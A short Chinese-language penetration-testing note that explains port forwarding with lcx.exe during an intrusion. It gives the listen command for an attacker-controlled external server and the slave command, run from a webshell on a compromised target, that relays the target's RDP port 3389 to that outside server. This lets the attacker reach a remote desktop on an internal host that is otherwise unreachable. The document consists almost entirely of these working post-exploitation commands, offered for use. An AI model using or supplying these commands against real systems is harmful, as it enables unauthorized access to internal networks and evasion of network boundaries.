條件:
目標主機3389端口開啓、一臺外網服務器、lcx.exe轉發工具
利用:
在外網服務器上面:
終端執行命令:lcx.exe -listen 1111 2222 (監聽1111端口流量轉發到2222端口上)
在webshell上面:
終端執行命令:lcx.exe -slave 外網服務器IP 1111 目標主機IP 3389 (將目標主機3389端口的流量轉發至外網服務器的1111端口上)
執行完命令之後我們只需要連接外網服務器的1111端口,就相當於連接目標主機的3389端口。
端口轉發主要解決的是在滲透過程中遇到的目標服務器存在於內網導致3389端口無法連接的情況。